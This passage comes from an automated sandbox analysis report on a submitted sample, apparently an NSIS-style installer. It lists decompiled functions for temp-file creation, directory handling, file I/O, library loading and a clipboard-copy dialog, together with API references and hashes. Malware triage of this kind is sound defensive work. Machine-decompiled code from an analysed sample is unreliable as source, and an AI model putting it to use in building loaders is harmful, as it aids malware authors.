                                                                                    • Instruction Fuzzy Hash: DDF0213051020A6BDB55D764DD0DFFB375CEB08304F14017AA58AF11C1DA78D5398B6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405CBF(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                    				char _t11;
                                                                                    				signed int _t12;
                                                                                    				int _t15;
                                                                                    				signed int _t17;
                                                                                    				void* _t20;
                                                                                    				CHAR* _t21;
                                                                                    
                                                                                    				_t21 = _a4;
                                                                                    				_t20 = 0x64;
                                                                                    				while(1) {
                                                                                    					_t11 =  *0x40a3d4; // 0x61736e
                                                                                    					_t20 = _t20 - 1;
                                                                                    					_a4 = _t11;
                                                                                    					_t12 = GetTickCount();
                                                                                    					_t17 = 0x1a;
                                                                                    					_a6 = _a6 + _t12 % _t17;
                                                                                    					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                                                    					if(_t15 != 0) {
                                                                                    						break;
                                                                                    					}
                                                                                    					if(_t20 != 0) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					 *_t21 =  *_t21 & 0x00000000;
                                                                                    					return _t15;
                                                                                    				}
                                                                                    				return _t21;
                                                                                    			}










                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 00405CD3
                                                                                    • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CED
                                                                                    Strings
                                                                                    • nsa, xrefs: 00405CCA
                                                                                    • "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" , xrefs: 00405CBF
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405CC2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    Similarity
                                                                                    • API ID: CountFileNameTempTick
                                                                                    • String ID: "C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                    • API String ID: 1716503409-3163824894
                                                                                    • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                    • Instruction ID: e7aa094648ebfea3bacdca9f43850832113df4cf88f6c4d01cd72ac7e01032f8
                                                                                    • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                    • Instruction Fuzzy Hash: 0AF08236308308ABEB108F56ED04B9B7BACDF91750F10C03BFA44EB290D6B499548758
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 60%
                                                                                    			E0040209D(void* __ebx, void* __eflags) {
                                                                                    				struct HINSTANCE__* _t18;
                                                                                    				struct HINSTANCE__* _t26;
                                                                                    				void* _t27;
                                                                                    				struct HINSTANCE__* _t30;
                                                                                    				CHAR* _t32;
                                                                                    				intOrPtr* _t33;
                                                                                    				void* _t34;
                                                                                    
                                                                                    				_t27 = __ebx;
                                                                                    				asm("sbb eax, 0x42f4f8");
                                                                                    				 *(_t34 - 4) = 1;
                                                                                    				if(__eflags < 0) {
                                                                                    					_push(0xffffffe7);
                                                                                    					L15:
                                                                                    					E00401423();
                                                                                    					L16:
                                                                                    					 *0x42f4c8 =  *0x42f4c8 +  *(_t34 - 4);
                                                                                    					return 0;
                                                                                    				}
                                                                                    				_t32 = E00402BCE(0xfffffff0);
                                                                                    				 *(_t34 + 8) = E00402BCE(1);
                                                                                    				if( *((intOrPtr*)(_t34 - 0x18)) == __ebx) {
                                                                                    					L3:
                                                                                    					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
                                                                                    					_t30 = _t18;
                                                                                    					if(_t30 == _t27) {
                                                                                    						_push(0xfffffff6);
                                                                                    						goto L15;
                                                                                    					}
                                                                                    					L4:
                                                                                    					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
                                                                                    					if(_t33 == _t27) {
                                                                                    						E0040521E(0xfffffff7,  *(_t34 + 8));
                                                                                    					} else {
                                                                                    						 *(_t34 - 4) = _t27;
                                                                                    						if( *((intOrPtr*)(_t34 - 0x20)) == _t27) {
                                                                                    							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x430000, 0x40b878, 0x40a000); // executed
                                                                                    						} else {
                                                                                    							E00401423( *((intOrPtr*)(_t34 - 0x20)));
                                                                                    							if( *_t33() != 0) {
                                                                                    								 *(_t34 - 4) = 1;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004038AA(_t30) != 0) {
                                                                                    						FreeLibrary(_t30);
                                                                                    					}
                                                                                    					goto L16;
                                                                                    				}
                                                                                    				_t26 = GetModuleHandleA(_t32); // executed
                                                                                    				_t30 = _t26;
                                                                                    				if(_t30 != __ebx) {
                                                                                    					goto L4;
                                                                                    				}
                                                                                    				goto L3;
                                                                                    			}











                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00422448,73BCEA30,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                                                      • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00422448,73BCEA30,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                                                      • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00422448,73BCEA30), ref: 0040527A
                                                                                      • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                                                      • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                                                    • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 004020E8
                                                                                    • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 00402152
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 2987980305-0
                                                                                    • Opcode ID: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                                                                                    • Instruction ID: f7200b9d034bcb950a45a2beb12b39e5fe5f048be62c56950c98b25cd9e943c1
                                                                                    • Opcode Fuzzy Hash: 7d01c9a26376e903ef8f956939bf13d5e0cf1485282589c35b64df24d5e4481f
                                                                                    • Instruction Fuzzy Hash: 7A21C932600115EBCF207FA58F49A5F76B1AF14359F20423BF651B61D1CABC89829A5E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 87%
                                                                                    			E004015BB(char __ebx, void* __eflags) {
                                                                                    				void* _t13;
                                                                                    				int _t19;
                                                                                    				char _t21;
                                                                                    				void* _t22;
                                                                                    				char _t23;
                                                                                    				signed char _t24;
                                                                                    				char _t26;
                                                                                    				CHAR* _t28;
                                                                                    				char* _t32;
                                                                                    				void* _t33;
                                                                                    
                                                                                    				_t26 = __ebx;
                                                                                    				_t28 = E00402BCE(0xfffffff0);
                                                                                    				_t13 = E00405B28(_t28);
                                                                                    				_t30 = _t13;
                                                                                    				if(_t13 != __ebx) {
                                                                                    					do {
                                                                                    						_t32 = E00405ABA(_t30, 0x5c);
                                                                                    						_t21 =  *_t32;
                                                                                    						 *_t32 = _t26;
                                                                                    						 *((char*)(_t33 + 0xb)) = _t21;
                                                                                    						if(_t21 != _t26) {
                                                                                    							L5:
                                                                                    							_t22 = E00405761(_t28);
                                                                                    						} else {
                                                                                    							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
                                                                                    							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E0040577E(_t39) == 0) {
                                                                                    								goto L5;
                                                                                    							} else {
                                                                                    								_t22 = E004056E4(_t28); // executed
                                                                                    							}
                                                                                    						}
                                                                                    						if(_t22 != _t26) {
                                                                                    							if(_t22 != 0xb7) {
                                                                                    								L9:
                                                                                    								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                    							} else {
                                                                                    								_t24 = GetFileAttributesA(_t28); // executed
                                                                                    								if((_t24 & 0x00000010) == 0) {
                                                                                    									goto L9;
                                                                                    								}
                                                                                    							}
                                                                                    						}
                                                                                    						_t23 =  *((intOrPtr*)(_t33 + 0xb));
                                                                                    						 *_t32 = _t23;
                                                                                    						_t30 = _t32 + 1;
                                                                                    					} while (_t23 != _t26);
                                                                                    				}
                                                                                    				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
                                                                                    					_push(0xfffffff5);
                                                                                    					E00401423();
                                                                                    				} else {
                                                                                    					E00401423(0xffffffe6);
                                                                                    					E004060F7("C:\\Users\\jones\\AppData\\Local\\Temp", _t28);
                                                                                    					_t19 = SetCurrentDirectoryA(_t28); // executed
                                                                                    					if(_t19 == 0) {
                                                                                    						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
                                                                                    					}
                                                                                    				}
                                                                                    				 *0x42f4c8 =  *0x42f4c8 +  *((intOrPtr*)(_t33 - 4));
                                                                                    				return 0;
                                                                                    			}














                                                                                    APIs
                                                                                      • Part of subcall function 00405B28: CharNextA.USER32(?,?,0042BC98,?,00405B94,0042BC98,0042BC98,73BCFA90,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,73BCFA90,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B36
                                                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B3B
                                                                                      • Part of subcall function 00405B28: CharNextA.USER32(00000000), ref: 00405B4F
                                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                      • Part of subcall function 004056E4: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405727
                                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp
                                                                                    • API String ID: 1892508949-47812868
                                                                                    • Opcode ID: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                                                                                    • Instruction ID: 2360f0c6ce39ff042ef5b5b007943225e6ab3dc636003d735fb75761c746189e
                                                                                    • Opcode Fuzzy Hash: f83e9c126ec5e5627e04690920b1fc6d95bfd0f8b27b2dc86f60bbb393f00223
                                                                                    • Instruction Fuzzy Hash: C1110431204141EBCB307FB55D419BF37B09A52725B284A7FE591B22E3DA3D4943AA2E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 59%
                                                                                    			E00401389(signed int _a4) {
                                                                                    				intOrPtr* _t6;
                                                                                    				void* _t8;
                                                                                    				void* _t10;
                                                                                    				signed int _t11;
                                                                                    				void* _t12;
                                                                                    				signed int _t16;
                                                                                    				signed int _t17;
                                                                                    				void* _t18;
                                                                                    
                                                                                    				_t17 = _a4;
                                                                                    				while(_t17 >= 0) {
                                                                                    					_t6 = _t17 * 0x1c +  *0x42f470;
                                                                                    					if( *_t6 == 1) {
                                                                                    						break;
                                                                                    					}
                                                                                    					_push(_t6); // executed
                                                                                    					_t8 = E00401434(); // executed
                                                                                    					if(_t8 == 0x7fffffff) {
                                                                                    						return 0x7fffffff;
                                                                                    					}
                                                                                    					_t10 = E0040136D(_t8);
                                                                                    					if(_t10 != 0) {
                                                                                    						_t11 = _t10 - 1;
                                                                                    						_t16 = _t17;
                                                                                    						_t17 = _t11;
                                                                                    						_t12 = _t11 - _t16;
                                                                                    					} else {
                                                                                    						_t12 = _t10 + 1;
                                                                                    						_t17 = _t17 + 1;
                                                                                    					}
                                                                                    					if( *((intOrPtr*)(_t18 + 0xc)) != 0) {
                                                                                    						 *0x42ec0c =  *0x42ec0c + _t12;
                                                                                    						SendMessageA( *(_t18 + 0x18), 0x402, MulDiv( *0x42ec0c, 0x7530,  *0x42ebf4), 0);
                                                                                    					}
                                                                                    				}
                                                                                    				return 0;
                                                                                    			}












                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                    • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                     • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                     • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: MessageSend
                                                                                    • String ID:
                                                                                    • API String ID: 3850602802-0
                                                                                    • Opcode ID: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                                    • Instruction ID: 5c958b1953f7fe6cfac6f5d6f257cc34f78b067395a477e057d2c1298905e336
                                                                                    • Opcode Fuzzy Hash: c8a7ffa28b32ff67f29a84afd2625c26bb9c758fd8177903822af55b1e7359ed
                                                                                    • Instruction Fuzzy Hash: F801D1317242209BE7195B79DD08B6A3698E710718F50823AF851F61F1DA78DC129B4D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00406500(signed int _a4) {
                                                                                    				struct HINSTANCE__* _t5;
                                                                                    				signed int _t10;
                                                                                    
                                                                                    				_t10 = _a4 << 3;
                                                                                    				_t8 =  *(_t10 + 0x40a240);
                                                                                    				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
                                                                                    				if(_t5 != 0) {
                                                                                    					L2:
                                                                                    					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
                                                                                    				}
                                                                                    				_t5 = E00406492(_t8); // executed
                                                                                    				if(_t5 == 0) {
                                                                                    					return 0;
                                                                                    				}
                                                                                    				goto L2;
                                                                                    			}






                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                                                      • Part of subcall function 00406492: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004064A9
                                                                                      • Part of subcall function 00406492: wsprintfA.USER32 ref: 004064E2
                                                                                      • Part of subcall function 00406492: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064F6
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.656835129.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.656827724.0000000000400000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656846871.0000000000408000.00000002.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656854254.000000000040A000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656864509.0000000000415000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656885480.000000000042C000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656892970.0000000000435000.00000004.00020000.sdmp
                                                                                    • Associated: 00000000.00000002.656899144.0000000000438000.00000002.00020000.sdmp
                                                                                    Similarity
                                                                                    • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 2547128583-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 68%
                                                                                    			E00405C90(CHAR* _a4, long _a8, long _a12) {
                                                                                    				signed int _t5;
                                                                                    				void* _t6;
                                                                                    
                                                                                    				_t5 = GetFileAttributesA(_a4); // executed
                                                                                    				asm("sbb ecx, ecx");
                                                                                    				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
                                                                                    				return _t6;
                                                                                    			}






                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\1cec9342_by_Libranalysis.exe,80000000,00000003), ref: 00405C94
                                                                                    • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                                                    Similarity
                                                                                    • API ID: File$AttributesCreate
                                                                                    • String ID:
                                                                                    • API String ID: 415043291-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405C6B(CHAR* _a4) {
                                                                                    				signed char _t3;
                                                                                    				signed char _t7;
                                                                                    
                                                                                    				_t3 = GetFileAttributesA(_a4); // executed
                                                                                    				_t7 = _t3;
                                                                                    				if(_t7 != 0xffffffff) {
                                                                                    					SetFileAttributesA(_a4, _t3 & 0x000000fe);
                                                                                    				}
                                                                                    				return _t7;
                                                                                    			}






                                                                                    APIs
                                                                                    • GetFileAttributesA.KERNELBASE(?,?,00405883,?,?,00000000,00405A66,?,?,?,?), ref: 00405C70
                                                                                    • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405C84
                                                                                    Similarity
                                                                                    • API ID: AttributesFile
                                                                                    • String ID:
                                                                                    • API String ID: 3188754299-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405761(CHAR* _a4) {
                                                                                    				int _t2;
                                                                                    
                                                                                    				_t2 = CreateDirectoryA(_a4, 0); // executed
                                                                                    				if(_t2 == 0) {
                                                                                    					return GetLastError();
                                                                                    				}
                                                                                    				return 0;
                                                                                    			}





                                                                                    APIs
                                                                                    • CreateDirectoryA.KERNELBASE(?,00000000,0040333B,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,0040355A,?,00000007,00000009,0000000B), ref: 00405767
                                                                                    • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 00405775
                                                                                    Similarity
                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                    • String ID:
                                                                                    • API String ID: 1375471231-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405D08(void* _a4, void* _a8, long _a12) {
                                                                                    				int _t7;
                                                                                    				long _t11;
                                                                                    
                                                                                    				_t11 = _a12;
                                                                                    				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                    				if(_t7 == 0 || _t11 != _a12) {
                                                                                    					return 0;
                                                                                    				} else {
                                                                                    					return 1;
                                                                                    				}
                                                                                    			}






                                                                                    APIs
                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032FD,00000000,00000000,00403127,000000FF,00000004,00000000,00000000,00000000), ref: 00405D1C
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID:
                                                                                    • API String ID: 2738559852-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405D37(void* _a4, void* _a8, long _a12) {
                                                                                    				int _t7;
                                                                                    				long _t11;
                                                                                    
                                                                                    				_t11 = _a12;
                                                                                    				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                    				if(_t7 == 0 || _t11 != _a12) {
                                                                                    					return 0;
                                                                                    				} else {
                                                                                    					return 1;
                                                                                    				}
                                                                                    			}






                                                                                    APIs
                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004032B3,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405D4B
                                                                                    Similarity
                                                                                    • API ID: FileWrite
                                                                                    • String ID:
                                                                                    • API String ID: 3934441357-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00403300(long _a4) {
                                                                                    				long _t2;
                                                                                    
                                                                                    				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                    				return _t2;
                                                                                    			}





                                                                                    APIs
                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403066,?), ref: 0040330E
                                                                                    Similarity
                                                                                    • API ID: FilePointer
                                                                                    • String ID:
                                                                                    • API String ID: 973152223-0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Non-executed Functions

                                                                                    C-Code - Quality: 96%
                                                                                    			E0040535C(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                    				struct HWND__* _v8;
                                                                                    				struct tagRECT _v24;
                                                                                    				void* _v32;
                                                                                    				signed int _v36;
                                                                                    				int _v40;
                                                                                    				int _v44;
                                                                                    				signed int _v48;
                                                                                    				int _v52;
                                                                                    				void* _v56;
                                                                                    				void* _v64;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				struct HWND__* _t87;
                                                                                    				struct HWND__* _t89;
                                                                                    				long _t90;
                                                                                    				int _t95;
                                                                                    				int _t96;
                                                                                    				long _t99;
                                                                                    				void* _t102;
                                                                                    				intOrPtr _t124;
                                                                                    				struct HWND__* _t128;
                                                                                    				int _t150;
                                                                                    				int _t153;
                                                                                    				long _t157;
                                                                                    				struct HWND__* _t161;
                                                                                    				struct HMENU__* _t163;
                                                                                    				long _t165;
                                                                                    				void* _t166;
                                                                                    				char* _t167;
                                                                                    				char* _t168;
                                                                                    				int _t169;
                                                                                    
                                                                                    				_t87 =  *0x42ec04; // 0x0
                                                                                    				_t157 = _a8;
                                                                                    				_t150 = 0;
                                                                                    				_v8 = _t87;
                                                                                    				if(_t157 != 0x110) {
                                                                                    					__eflags = _t157 - 0x405;
                                                                                    					if(_t157 == 0x405) {
                                                                                    						CloseHandle(CreateThread(0, 0, E004052F0, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                                                                                    					}
                                                                                    					__eflags = _t157 - 0x111;
                                                                                    					if(_t157 != 0x111) {
                                                                                    						L17:
                                                                                    						__eflags = _t157 - 0x404;
                                                                                    						if(_t157 != 0x404) {
                                                                                    							L25:
                                                                                    							__eflags = _t157 - 0x7b;
                                                                                    							if(_t157 != 0x7b) {
                                                                                    								goto L20;
                                                                                    							}
                                                                                    							_t89 = _v8;
                                                                                    							__eflags = _a12 - _t89;
                                                                                    							if(_a12 != _t89) {
                                                                                    								goto L20;
                                                                                    							}
                                                                                    							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                                                    							__eflags = _t90 - _t150;
                                                                                    							_a12 = _t90;
                                                                                    							if(_t90 <= _t150) {
                                                                                    								L36:
                                                                                    								return 0;
                                                                                    							}
                                                                                    							_t163 = CreatePopupMenu();
                                                                                    							AppendMenuA(_t163, _t150, 1, E0040618A(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                                                    							_t95 = _a16;
                                                                                    							__eflags = _a16 - 0xffffffff;
                                                                                    							_t153 = _a16 >> 0x10;
                                                                                    							if(_a16 == 0xffffffff) {
                                                                                    								GetWindowRect(_v8,  &_v24);
                                                                                    								_t95 = _v24.left;
                                                                                    								_t153 = _v24.top;
                                                                                    							}
                                                                                    							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                                                    							__eflags = _t96 - 1;
                                                                                    							if(_t96 == 1) {
                                                                                    								_t165 = 1;
                                                                                    								__eflags = 1;
                                                                                    								_v56 = _t150;
                                                                                    								_v44 = 0x42a890;
                                                                                    								_v40 = 0x1000;
                                                                                    								_a4 = _a12;
                                                                                    								do {
                                                                                    									_a4 = _a4 - 1;
                                                                                    									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                                                    									__eflags = _a4 - _t150;
                                                                                    									_t165 = _t165 + _t99 + 2;
                                                                                    								} while (_a4 != _t150);
                                                                                    								OpenClipboard(_t150);
                                                                                    								EmptyClipboard();
                                                                                    								_t102 = GlobalAlloc(0x42, _t165);
                                                                                    								_a4 = _t102;
                                                                                    								_t166 = GlobalLock(_t102);
                                                                                    								do {
                                                                                    									_v44 = _t166;
                                                                                    									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                                                    									 *_t167 = 0xd;
                                                                                    									_t168 = _t167 + 1;
                                                                                    									 *_t168 = 0xa;
                                                                                    									_t166 = _t168 + 1;
                                                                                    									_t150 = _t150 + 1;
                                                                                    									__eflags = _t150 - _a12;
                                                                                    								} while (_t150 < _a12);
                                                                                    								GlobalUnlock(_a4);
                                                                                    								SetClipboardData(1, _a4);
                                                                                    								CloseClipboard();
                                                                                    							}
                                                                                    							goto L36;
                                                                                    						}
                                                                                    						__eflags =  *0x42ebec - _t150; // 0x0
                                                                                    						if(__eflags == 0) {
                                                                                    							ShowWindow( *0x42f428, 8);
                                                                                    							__eflags =  *0x42f4cc - _t150;
                                                                                    							if( *0x42f4cc == _t150) {
                                                                                    								E0040521E( *((intOrPtr*)( *0x42a068 + 0x34)), _t150);
                                                                                    							}
                                                                                    							E00404154(1);
                                                                                    							goto L25;
                                                                                    						}
                                                                                    						 *0x429c60 = 2;
                                                                                    						E00404154(0x78);
                                                                                    						goto L20;
                                                                                    					} else {
                                                                                    						__eflags = _a12 - 0x403;
                                                                                    						if(_a12 != 0x403) {
                                                                                    							L20:
                                                                                    							return E004041E2(_t157, _a12, _a16);
                                                                                    						}
                                                                                    						ShowWindow( *0x42ebf0, _t150);
                                                                                    						ShowWindow(_v8, 8);
                                                                                    						E004041B0(_v8);
                                                                                    						goto L17;
                                                                                    					}
                                                                                    				}
                                                                                    				_v48 = _v48 | 0xffffffff;
                                                                                    				_v36 = _v36 | 0xffffffff;
                                                                                    				_t169 = 2;
                                                                                    				_v56 = _t169;
                                                                                    				_v52 = 0;
                                                                                    				_v44 = 0;
                                                                                    				_v40 = 0;
                                                                                    				asm("stosd");
                                                                                    				asm("stosd");
                                                                                    				_t124 =  *0x42f434;
                                                                                    				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                                                    				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                                                    				 *0x42ebf0 = GetDlgItem(_a4, 0x403);
                                                                                    				 *0x42ebe8 = GetDlgItem(_a4, 0x3ee);
                                                                                    				_t128 = GetDlgItem(_a4, 0x3f8);
                                                                                    				 *0x42ec04 = _t128;
                                                                                    				_v8 = _t128;
                                                                                    				E004041B0( *0x42ebf0);
                                                                                    				 *0x42ebf4 = E00404AA1(4);
                                                                                    				 *0x42ec0c = 0;
                                                                                    				GetClientRect(_v8,  &_v24);
                                                                                    				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                                                    				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                                                    				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                                                    				if(_a12 >= 0) {
                                                                                    					SendMessageA(_v8, 0x1001, 0, _a12);
                                                                                    					SendMessageA(_v8, 0x1026, 0, _a12);
                                                                                    				}
                                                                                    				if(_a8 >= _t150) {
                                                                                    					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                                                    				}
